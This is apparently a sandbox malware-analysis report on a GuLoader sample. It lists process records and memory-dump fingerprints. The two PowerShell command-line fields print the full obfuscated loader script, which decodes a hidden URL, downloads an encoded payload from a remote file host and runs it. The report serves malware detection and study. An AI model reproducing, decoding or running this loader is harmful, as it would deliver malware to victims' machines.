                                    Imagebase:0x7ff645f90000
                                    File size:170'496 bytes
                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:2
                                    Start time:07:10:16
                                    Start date:21/10/2024
                                    Path:C:\Windows\System32\PING.EXE
                                    Wow64 process (32bit):false
                                    Commandline:ping gormezl_6777.6777.6777.677e
                                    Imagebase:0x7ff655de0000
                                    File size:22'528 bytes
                                    MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:3
                                    Start time:07:10:16
                                    Start date:21/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff68cce0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:4
                                    Start time:07:10:17
                                    Start date:21/10/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Inspeaking Overpratice Hreapparater Heteroscian #>;$Filibusterous='Koordinatvrdiernes';<#Panhygrous Procurer Cantors Emeraldine #>;$Husklike=$Erhvervsaffaldets+$host.UI; function Lymnaeid($Simonize){If ($Husklike) {$Methodisty++;}$Minimumstermometeret=$Knaster+$Simonize.'Length'-$Methodisty; for( $Pales=4;$Pales -lt $Minimumstermometeret;$Pales+=5){$Postcardinal=$Pales;$Dekompressionen+=$Simonize[$Pales];$underbreeding='Helstegte';}$Dekompressionen;}function Orfrays($Advolution){ .($Landbetjents) ($Advolution);}$originate=Lymnaeid 'UnsuMAntiokampzBlegi R,nlBerelHobbaCo p/ run ';$originate+=Lymnaeid 'fors5Kjel.Thom0F,rb Nama(KaprW UnfiNo onDueldS,jdolagowMil,sObsc SixpN UndTPoly Skri1 Dyb0rigs.Toko0Scia;Unde BullWUnpri IndnNont6 Res4Soci;lind AminxBlya6Hngs4met.;rlin CaprfolkvLizz:Egoi1Tand3Fest1Anta. .al0 Fi )Cl.p JogG yrkedecoc.orbkG.aso fej/ Kir2Skil0erek1 ob0 c,n0Myon1Prod0Ddss1Acqu PumFAt,li .lorIndieHus fDeloo Im,xBena/Tha 1Colo3S ip1Pap . 
git0 Tre ';$Vgtighedens=Lymnaeid 'Erh.u Bous D fE Currunbl-parka P,pgstate axnBibltFore ';$Adaptively=Lymnaeid ' trh Bist Cont An pFares B,l:Agen/Rund/KvaloDeforC ratStabhBruloVe biBo,smOutspSolfl.kdea BaanSnontDeckcBuc eSokknVerdt U,eeNondrFire.arkarNldeoTech/CarbBPageeB.rtsSlabtDobbyPolir HeleUn.etBed,.squaoMirkc Uncximcn ';$Reformbevgelser=Lymnaeid 'Pre,>R,ma ';$Landbetjents=Lymnaeid 'Ma ci,atoE impxS.rv ';$Befolk='lousin';$Vitalizings='\Kinetoplast.Liq';Orfrays (Lymnaeid 'Patr$BrysgUnpol So OKronB UpsaS iklLulu: icho Pr.dU,naI Sy SAlloEkatarprecELevi=Rede$Do re SalnKlikvChef:lynnAMa opFluoPS msdKamea,nddtE eraPyro+Foto$ Vr.vNadvI OphT ilmA Letl ,idiSubtzBawdiDy en Re GMilkSBr.t ');Orfrays (Lymnaeid ' S r$af rg,pspLDr,aOOpfoBCo ca UndlTe r:Hyp.dHun.O,remBUnspbnar ENamel Maht HiehUnchENedsdUpereRabaRFossN LogE a bsSham= r c$Di kALyttdDrataTiggP DeitTvanIScanVD maeRom L,odsYAnan.MegasTradpb dqlUdgiIune.T J n(Tr a$Srnur eaueAngeF Fo.OGradr VelMEst,b ileDatav Gu.GRetoEC.njLPhansSjleE Tonr Ecd)G ln ');Orfrays (Lymnaeid ' Svm[HespNEuklE bnetHest.BackSF dsEPolyRVic vConsIKultCEnduE egiPKonkoGrypiSmaaNAaret RhymKulmAGennnanalA L aGM,skekonfrairm] Lux: D.k:Nonms Di.EOverc OveUDispRCaviIActutJuryyBygnpRin,RGrimoM.eaTOpdaoDuoeCHudiOManiLUn n Farv=E,te Brug[ UndnTungeRigsTSky .BilcSR goE AttcSw,euKorrrCaphi Kikt andYNavnpBlokREk io Armt AmaoO,nocspoooU,trl Ma.TC viY.rogPMyste U y]Hal :Chin:AlahtEm,iL EncSDepe1Udda2Az m ');$Adaptively=$Dobbelthedernes[0];$Udbyttebehandling=(Lymnaeid ' Lea$DrilGPneuLHoteOBeneBSem.aNdeslPyic:PuliG kniYDiscM F gNSk mAfamisKvisIThigUD.ntmSimu=BrugnPeleE.aboW imr-UnsooAk ibPoliJ,dpoeTolvCS riTAgro AsmasSk iYMastsNonotimpeEquo MSu c.antinImprEKabuTPaa,. 
BygwVandESligBOutpCInd LBoliidiasEGramn AffTBe,i ');Orfrays ($Udbyttebehandling);Orfrays (Lymnaeid 'Vu g$RevoG nimy JagmRykknDiglachrisAktii wrouTra mSa,o.af.eH oopeEnroaOstrd Mone storArtis cle[Hand$TypeV EksgNsketGrshi Indg AuthUneqekampd K ne lufnPol s Paa]Unma=Helv$ S ro P.erRan iTricgHotei SunnOuttaJerntSkare ygi ');$Praege=Lymnaeid 'Forl$.denG MeeyChapmBlitns.staoutrsOpdyi SpeuAfblmKoll. RusDIneqoN nfwSupenTaarlKommoteglaPsykd AmeF Humi Surl EskeS,em(Vesi$ LanAg.itdU koaFortp Ta tSprii C.avState E.tlDopey Klo, Sel$ Ap cad ehConceMatheSusts Ho e Ge mpolio counPrergTraue SkarPreei KvanAmt,gP ed)Abse ';$cheesemongering=$Odisere;Orfrays (Lymnaeid ' Cen$UnfogS raLReceOPermBcel.aUkvalLevi: Kd RAa sEs.ollUne,A imltAddiiDansvBrusEUndetLed S Med= ,er( StiTDenoESlagsrootTurte-frigpPhalaWil TOverHglyc Hush$P vecSoveHTrumeManke iblS TriEPrecm SamO R pn E kgBogsEUngurAdreiTwe nPreigBo t)Sol ');while (!$Relativets) {Orfrays (Lymnaeid ' van$IndsgUndelS,nsoVibrbFolkaPo,yl A.p:vandSF yvcRakeuWinit,lbaiInkobjupor ffia Joun,mascG nahAllei ForaHead=En o$Tetrt SvorVr guSamkeTamb ') ;Orfrays $Praege;Orfrays (Lymnaeid ',ondsKorntHjerAwhi R Hidt ara-Ca tSHaevlSaksE,nineJ erpPenn Rot4Tele ');Orfrays (Lymnaeid 'Eksa$SquiG NonlSippO etbTiliAParilMist:KeyeR enaeTherlOpslaUndet .agi Catv U.meRkketB ags ann=Haan(G osTForrETurbSBlysTIceq- S.mpAfkaAUndetRecaHGirn Sig$ optCBarbhB ckeCem eSimiSJensEHutcMKjolo Supn,xiogPl dESen.rAnt iBr mNPr fGUn.a)inte ') ;Orfrays (Lymnaeid ' Pro$BestgLugtLPallOPro BAfteABlokLP rt:StivtTeleOH,veRLotht VarUBlocRgrafR Klbe FlidOvals P,rK,visaStvlBPalmeTrk,RRrgtnRdl eLive= For$ExhiGUnshl JamONysgBAfdeaUnflLAbst:SuitRInteY s tT BriTIntoEUn ursvarSAbonkJerseArriREmignUd.ae Ove+ .ac+ Ov.%B an$JantDMentOMarcbKameBBl,vE ModL ProtKhelH Faketrstd None Shyr.einN vinefortSPant.EndecagroOInwrUBra N,nsttAvli ') ;$Adaptively=$Dobbelthedernes[$Torturredskaberne];}$Raatret=335849;$Afft=30088;Orfrays (Lymnaeid 'Vag.$UdlngFablL P eOTh wbOmniaPerklfeud: ranMU ilIWi tLMetaJ 
lmobCopuEUdklS .obkLandy FalTTr ntSasheSteml aulsDoorEKontSPreaSSpooeBrneKHypstUlykO ConrSkri ear,= dou orsGKlimeKultT Eu -PunnCBilaOCo tNIslnTGrovE tarn C,ptskyd Stat$LnfrCTen hDireeAffeEReinsCercE esaMMaleOFluoN onsGRoseEPlairStavi npaNBenhg Ego ');Orfrays (Lymnaeid 'Peri$Embrg QuilSu.foBallbFod a AdelF rb:HabrV autigebermaniiRekrdLoveiJensgrecoeOpdrnEfteo Benu GossHors Heli=hous Krop[SionSRepryAlonsErintK,seeD ffmBest.Bes,CCentoEmannVennv skee RecrSpintD.ms] Und:Falc:NummFStasr Ejeo FalmDvalBproraVedlsAcroeBeed6V by4 ChrSOmskt ForrPolsiFolknOverg Pr (Pels$BedyMDikki F.rl orjFordbBorse IldsDrunkL neyLungt Sp t FraeVu.glT.ansOmste PresSquosI tre FibkBiblt uloCaderBom ) Zoo ');Orfrays (Lymnaeid ' Kom$ Ba gFleelOrgaO amsbHe,eaDobblDo n:BagtY isln,eunkDalrSLotho ccoMIfres,erotSve Ktti=,yrr seu[Precs H sYFo ksRistTJunkeAfklmPyro.raasTEftee RegxNedvtShun. Arme.nfenKatnCkindoMangdLepti k inMariG na]Over:Nonc:KalaAK,glsPimpcAdeaIkermI Lie.RumngF lse M ktAntesBlo,TManirExpoiAlien E sG Min(Inc $E,epvKolliAngiR ajiAnlgd gneIWilegUddiEHy,eNSi koKommuMi is G a)Verf ');Orfrays (Lymnaeid 'Stro$NonsGBispl ejogirabPe oaSpisl iml:LangTLam H ForaKardnPrefa .oyTBi loHudaLDarkONoncg ubm=Taal$ReviY adeNPallK Tras G eOS arMForsS Po,TM rp. scasBesmuUnnaBSkjosEn.iTInterCav.IvrtsNGa.mG Unw(.rev$GymnrSubcAA toAUndeTAstrR Br.eDesutBog ,Inte$MythaForrfAva,Frailt Vil) Rub ');Orfrays $Thanatolog;"
                                    Imagebase:0x7ff6eb350000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.1704308297.000001DE999BE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:07:10:17
                                    Start date:21/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff68cce0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:7
                                    Start time:07:10:26
                                    Start date:21/10/2024
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Inspeaking Overpratice Hreapparater Heteroscian #>;$Filibusterous='Koordinatvrdiernes';<#Panhygrous Procurer Cantors Emeraldine #>;$Husklike=$Erhvervsaffaldets+$host.UI; function Lymnaeid($Simonize){If ($Husklike) {$Methodisty++;}$Minimumstermometeret=$Knaster+$Simonize.'Length'-$Methodisty; for( $Pales=4;$Pales -lt $Minimumstermometeret;$Pales+=5){$Postcardinal=$Pales;$Dekompressionen+=$Simonize[$Pales];$underbreeding='Helstegte';}$Dekompressionen;}function Orfrays($Advolution){ .($Landbetjents) ($Advolution);}$originate=Lymnaeid 'UnsuMAntiokampzBlegi R,nlBerelHobbaCo p/ run ';$originate+=Lymnaeid 'fors5Kjel.Thom0F,rb Nama(KaprW UnfiNo onDueldS,jdolagowMil,sObsc SixpN UndTPoly Skri1 Dyb0rigs.Toko0Scia;Unde BullWUnpri IndnNont6 Res4Soci;lind AminxBlya6Hngs4met.;rlin CaprfolkvLizz:Egoi1Tand3Fest1Anta. .al0 Fi )Cl.p JogG yrkedecoc.orbkG.aso fej/ Kir2Skil0erek1 ob0 c,n0Myon1Prod0Ddss1Acqu PumFAt,li .lorIndieHus fDeloo Im,xBena/Tha 1Colo3S ip1Pap . 
git0 Tre ';$Vgtighedens=Lymnaeid 'Erh.u Bous D fE Currunbl-parka P,pgstate axnBibltFore ';$Adaptively=Lymnaeid ' trh Bist Cont An pFares B,l:Agen/Rund/KvaloDeforC ratStabhBruloVe biBo,smOutspSolfl.kdea BaanSnontDeckcBuc eSokknVerdt U,eeNondrFire.arkarNldeoTech/CarbBPageeB.rtsSlabtDobbyPolir HeleUn.etBed,.squaoMirkc Uncximcn ';$Reformbevgelser=Lymnaeid 'Pre,>R,ma ';$Landbetjents=Lymnaeid 'Ma ci,atoE impxS.rv ';$Befolk='lousin';$Vitalizings='\Kinetoplast.Liq';Orfrays (Lymnaeid 'Patr$BrysgUnpol So OKronB UpsaS iklLulu: icho Pr.dU,naI Sy SAlloEkatarprecELevi=Rede$Do re SalnKlikvChef:lynnAMa opFluoPS msdKamea,nddtE eraPyro+Foto$ Vr.vNadvI OphT ilmA Letl ,idiSubtzBawdiDy en Re GMilkSBr.t ');Orfrays (Lymnaeid ' S r$af rg,pspLDr,aOOpfoBCo ca UndlTe r:Hyp.dHun.O,remBUnspbnar ENamel Maht HiehUnchENedsdUpereRabaRFossN LogE a bsSham= r c$Di kALyttdDrataTiggP DeitTvanIScanVD maeRom L,odsYAnan.MegasTradpb dqlUdgiIune.T J n(Tr a$Srnur eaueAngeF Fo.OGradr VelMEst,b ileDatav Gu.GRetoEC.njLPhansSjleE Tonr Ecd)G ln ');Orfrays (Lymnaeid ' Svm[HespNEuklE bnetHest.BackSF dsEPolyRVic vConsIKultCEnduE egiPKonkoGrypiSmaaNAaret RhymKulmAGennnanalA L aGM,skekonfrairm] Lux: D.k:Nonms Di.EOverc OveUDispRCaviIActutJuryyBygnpRin,RGrimoM.eaTOpdaoDuoeCHudiOManiLUn n Farv=E,te Brug[ UndnTungeRigsTSky .BilcSR goE AttcSw,euKorrrCaphi Kikt andYNavnpBlokREk io Armt AmaoO,nocspoooU,trl Ma.TC viY.rogPMyste U y]Hal :Chin:AlahtEm,iL EncSDepe1Udda2Az m ');$Adaptively=$Dobbelthedernes[0];$Udbyttebehandling=(Lymnaeid ' Lea$DrilGPneuLHoteOBeneBSem.aNdeslPyic:PuliG kniYDiscM F gNSk mAfamisKvisIThigUD.ntmSimu=BrugnPeleE.aboW imr-UnsooAk ibPoliJ,dpoeTolvCS riTAgro AsmasSk iYMastsNonotimpeEquo MSu c.antinImprEKabuTPaa,. 
BygwVandESligBOutpCInd LBoliidiasEGramn AffTBe,i ');Orfrays ($Udbyttebehandling);Orfrays (Lymnaeid 'Vu g$RevoG nimy JagmRykknDiglachrisAktii wrouTra mSa,o.af.eH oopeEnroaOstrd Mone storArtis cle[Hand$TypeV EksgNsketGrshi Indg AuthUneqekampd K ne lufnPol s Paa]Unma=Helv$ S ro P.erRan iTricgHotei SunnOuttaJerntSkare ygi ');$Praege=Lymnaeid 'Forl$.denG MeeyChapmBlitns.staoutrsOpdyi SpeuAfblmKoll. RusDIneqoN nfwSupenTaarlKommoteglaPsykd AmeF Humi Surl EskeS,em(Vesi$ LanAg.itdU koaFortp Ta tSprii C.avState E.tlDopey Klo, Sel$ Ap cad ehConceMatheSusts Ho e Ge mpolio counPrergTraue SkarPreei KvanAmt,gP ed)Abse ';$cheesemongering=$Odisere;Orfrays (Lymnaeid ' Cen$UnfogS raLReceOPermBcel.aUkvalLevi: Kd RAa sEs.ollUne,A imltAddiiDansvBrusEUndetLed S Med= ,er( StiTDenoESlagsrootTurte-frigpPhalaWil TOverHglyc Hush$P vecSoveHTrumeManke iblS TriEPrecm SamO R pn E kgBogsEUngurAdreiTwe nPreigBo t)Sol ');while (!$Relativets) {Orfrays (Lymnaeid ' van$IndsgUndelS,nsoVibrbFolkaPo,yl A.p:vandSF yvcRakeuWinit,lbaiInkobjupor ffia Joun,mascG nahAllei ForaHead=En o$Tetrt SvorVr guSamkeTamb ') ;Orfrays $Praege;Orfrays (Lymnaeid ',ondsKorntHjerAwhi R Hidt ara-Ca tSHaevlSaksE,nineJ erpPenn Rot4Tele ');Orfrays (Lymnaeid 'Eksa$SquiG NonlSippO etbTiliAParilMist:KeyeR enaeTherlOpslaUndet .agi Catv U.meRkketB ags ann=Haan(G osTForrETurbSBlysTIceq- S.mpAfkaAUndetRecaHGirn Sig$ optCBarbhB ckeCem eSimiSJensEHutcMKjolo Supn,xiogPl dESen.rAnt iBr mNPr fGUn.a)inte ') ;Orfrays (Lymnaeid ' Pro$BestgLugtLPallOPro BAfteABlokLP rt:StivtTeleOH,veRLotht VarUBlocRgrafR Klbe FlidOvals P,rK,visaStvlBPalmeTrk,RRrgtnRdl eLive= For$ExhiGUnshl JamONysgBAfdeaUnflLAbst:SuitRInteY s tT BriTIntoEUn ursvarSAbonkJerseArriREmignUd.ae Ove+ .ac+ Ov.%B an$JantDMentOMarcbKameBBl,vE ModL ProtKhelH Faketrstd None Shyr.einN vinefortSPant.EndecagroOInwrUBra N,nsttAvli ') ;$Adaptively=$Dobbelthedernes[$Torturredskaberne];}$Raatret=335849;$Afft=30088;Orfrays (Lymnaeid 'Vag.$UdlngFablL P eOTh wbOmniaPerklfeud: ranMU ilIWi tLMetaJ 
lmobCopuEUdklS .obkLandy FalTTr ntSasheSteml aulsDoorEKontSPreaSSpooeBrneKHypstUlykO ConrSkri ear,= dou orsGKlimeKultT Eu -PunnCBilaOCo tNIslnTGrovE tarn C,ptskyd Stat$LnfrCTen hDireeAffeEReinsCercE esaMMaleOFluoN onsGRoseEPlairStavi npaNBenhg Ego ');Orfrays (Lymnaeid 'Peri$Embrg QuilSu.foBallbFod a AdelF rb:HabrV autigebermaniiRekrdLoveiJensgrecoeOpdrnEfteo Benu GossHors Heli=hous Krop[SionSRepryAlonsErintK,seeD ffmBest.Bes,CCentoEmannVennv skee RecrSpintD.ms] Und:Falc:NummFStasr Ejeo FalmDvalBproraVedlsAcroeBeed6V by4 ChrSOmskt ForrPolsiFolknOverg Pr (Pels$BedyMDikki F.rl orjFordbBorse IldsDrunkL neyLungt Sp t FraeVu.glT.ansOmste PresSquosI tre FibkBiblt uloCaderBom ) Zoo ');Orfrays (Lymnaeid ' Kom$ Ba gFleelOrgaO amsbHe,eaDobblDo n:BagtY isln,eunkDalrSLotho ccoMIfres,erotSve Ktti=,yrr seu[Precs H sYFo ksRistTJunkeAfklmPyro.raasTEftee RegxNedvtShun. Arme.nfenKatnCkindoMangdLepti k inMariG na]Over:Nonc:KalaAK,glsPimpcAdeaIkermI Lie.RumngF lse M ktAntesBlo,TManirExpoiAlien E sG Min(Inc $E,epvKolliAngiR ajiAnlgd gneIWilegUddiEHy,eNSi koKommuMi is G a)Verf ');Orfrays (Lymnaeid 'Stro$NonsGBispl ejogirabPe oaSpisl iml:LangTLam H ForaKardnPrefa .oyTBi loHudaLDarkONoncg ubm=Taal$ReviY adeNPallK Tras G eOS arMForsS Po,TM rp. scasBesmuUnnaBSkjosEn.iTInterCav.IvrtsNGa.mG Unw(.rev$GymnrSubcAA toAUndeTAstrR Br.eDesutBog ,Inte$MythaForrfAva,Frailt Vil) Rub ');Orfrays $Thanatolog;"
                                    Imagebase:0xf70000
                                    File size:433'152 bytes
                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000007.00000002.2865648783.0000000008A40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000007.00000002.2850277699.0000000005F1A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.2865783140.00000000095EB000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:false

                                    Target ID:8
                                    Start time:07:10:26
                                    Start date:21/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff68cce0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                      • Instruction Fuzzy Hash: 1DB18170E2020ADFDF10CFA8D9817EEFBF2AF88354F198529D415A7254EB749885CB91
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2831179214.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_32b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0d4ccf98cfe30abfc8baee0e2a784863aae43ce436c513bbf5fb5bac7f9243c9
                                      • Instruction ID: c6fbc88780fabfee36656ca0de5aac6bc60e65f556f060315c45f42419e6b845
                                      • Opcode Fuzzy Hash: 0d4ccf98cfe30abfc8baee0e2a784863aae43ce436c513bbf5fb5bac7f9243c9
                                      • Instruction Fuzzy Hash: D4B16F71E1020A9FDF14CFA8CD917DDBBF2AF48394F188529D815E7294EB749885CB81
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2861000025.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7970000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'_q$4'_q$4'_q$4'_q$4'_q$4'_q$4'_q$4'_q$4'_q$4'_q$4'_q$4'_q$x."k$x."k$-"k$-"k
                                      • API String ID: 0-2903908483
                                      • Opcode ID: 85a9e5a40041ff65faff291799e0043746c6fc7c761899116ec4488b29fac759
                                      • Instruction ID: badc1d1e4aba4874a0e5d18ac30c98953d8b66a09c5f252322394722b8e9308d
                                      • Opcode Fuzzy Hash: 85a9e5a40041ff65faff291799e0043746c6fc7c761899116ec4488b29fac759
                                      • Instruction Fuzzy Hash: 417280B4A10209DFC714DBA8C951B9EBBB2EB88308F14C5A9D905AF755CB71DC81CFA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2861000025.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7970000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (f1l$(f1l$(f1l$(f1l$(f1l$(f1l$(f1l$(f1l$4'_q$4'_q$tL#k
                                      • API String ID: 0-3513291722
                                      • Opcode ID: a3b99be4d465f299694fa993ec6816c0aa9a0a0327512a4e51254cf74ebe35db
                                      • Instruction ID: 40de835b5550d6f60e2e6762c07a15e13d8cf621c9e263e6a1e9e90de0adb49c
                                      • Opcode Fuzzy Hash: a3b99be4d465f299694fa993ec6816c0aa9a0a0327512a4e51254cf74ebe35db
                                      • Instruction Fuzzy Hash: 4F929CB4B00219DFD754CB58C881B59BBB2FB89308F25C1A8D909AB755DB72EC81CF91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2861000025.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7970000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (f1l$(f1l$(f1l$(f1l$(f1l$4'_q$tL#k
                                      • API String ID: 0-570438686
                                      • Opcode ID: 9c5ca38db8389332ce23e1267ca0547cbbeb1e875c3ee8c389e377e22d0233a2
                                      • Instruction ID: e24316f253aa29f7a2024ecd8757cb5d2ddf56437b6a4b64da32008179db4f7f
                                      • Opcode Fuzzy Hash: 9c5ca38db8389332ce23e1267ca0547cbbeb1e875c3ee8c389e377e22d0233a2
                                      • Instruction Fuzzy Hash: C6728BB4A00215DFD764CB18C981F59BBB2FB89308F15C1A8D909AB355DB72ED82CF91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2861000025.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7970000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (f1l$(f1l$4'_q$4'_q$x."k$x."k$-"k
                                      • API String ID: 0-453440438
                                      • Opcode ID: 540226414885856a28c033567ec4d442dd7eb1d481427d8fe058150810a2b905
                                      • Instruction ID: 6c78de5b8148e9cbf013fc9f5a0a559a74f003464237687f8b175cafbbcce45c
                                      • Opcode Fuzzy Hash: 540226414885856a28c033567ec4d442dd7eb1d481427d8fe058150810a2b905
                                      • Instruction Fuzzy Hash: 5FF1D1B4B002189FC714DBA8C851F6EBBB3AF84308F1084A9D909AF795DB759D81CF91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2861000025.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7970000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (f1l$4'_q$4'_q$4'_q$x."k$-"k
                                      • API String ID: 0-3855890274
                                      • Opcode ID: 28e6866e32d0b13ea860cdb73822b4e4aa007132a1203b359a69b380aa17967f
                                      • Instruction ID: dfc4a327934beeed4de1e7e2145714ab614feab1b30ad54dcfd89a91ca2f73b0
                                      • Opcode Fuzzy Hash: 28e6866e32d0b13ea860cdb73822b4e4aa007132a1203b359a69b380aa17967f
                                      • Instruction Fuzzy Hash: 2C128FB4A00209DFC714CB98C951BAEBBB2EB89308F15C599D9056F755CB71EC82CFA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2861000025.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7970000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (f1l$(f1l$(f1l$(f1l$x."k
                                      • API String ID: 0-4278957390
                                      • Opcode ID: dae840552e4099b50a901b11e35f8e83d0200bdac395716fa179369d1a79a833
                                      • Instruction ID: 3b4b29bcf6666b7daa97aae466e43c51191c10bc31405cd3b6e428d7d7b50f2a
                                      • Opcode Fuzzy Hash: dae840552e4099b50a901b11e35f8e83d0200bdac395716fa179369d1a79a833
                                      • Instruction Fuzzy Hash: C2B1A1B4B10205EFC714DBA8C555BAEBBF2AB88308F11C168E905AF755CB76EC41CB91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2861000025.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7970000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 84/l$84/l$tP_q$tP_q
                                      • API String ID: 0-2285905419
                                      • Opcode ID: 74a5d02267bb116355f6618a2070e54435de7d456fea128c388702be7b4d8bde
                                      • Instruction ID: 2ec8f17961f6fa49d330cef9174c32f3ac4ca31801b19f22be77bf6ad6c65d85
                                      • Opcode Fuzzy Hash: 74a5d02267bb116355f6618a2070e54435de7d456fea128c388702be7b4d8bde
                                      • Instruction Fuzzy Hash: DA41ADB06453C5AFC7218B68C814B16FFB6AF46308F18C49BE944DF292CA75DC45C3A2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2831179214.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_32b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Hcq$$_q$$_q
                                      • API String ID: 0-3221398524
                                      • Opcode ID: 84bebae368c535c5e96b80c9d4891d5d991fc66e96e5eabc034a1f5a01f3e75e
                                      • Instruction ID: b45d6e5863dd3852c7e2ba2a2c5ac9baa4c3be222159790cfb85c6d395d10877
                                      • Opcode Fuzzy Hash: 84bebae368c535c5e96b80c9d4891d5d991fc66e96e5eabc034a1f5a01f3e75e
                                      • Instruction Fuzzy Hash: 77125E34B102288FCB25DB28C8546EEB7B6AF89344F1544E9D40AAB365DF359E85CF81
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2861000025.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7970000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'_q$4'_q$$_q
                                      • API String ID: 0-2880775569
                                      • Opcode ID: ca8a4f6f8c883ea1bdcee2ff43679c66c76c8488b09263c303e817ecee59bea3
                                      • Instruction ID: a742fb89e820f342fac8a5accdf362f3eeb32c4689f194a1721e6c11e80e4085
                                      • Opcode Fuzzy Hash: ca8a4f6f8c883ea1bdcee2ff43679c66c76c8488b09263c303e817ecee59bea3
                                      • Instruction Fuzzy Hash: EAA188B07083468FCB158B78C819A6A7FF6DF86218F24C8AAD540CF262DB35DC45C7A1
                                      Strings
                                      Memory Dump Source
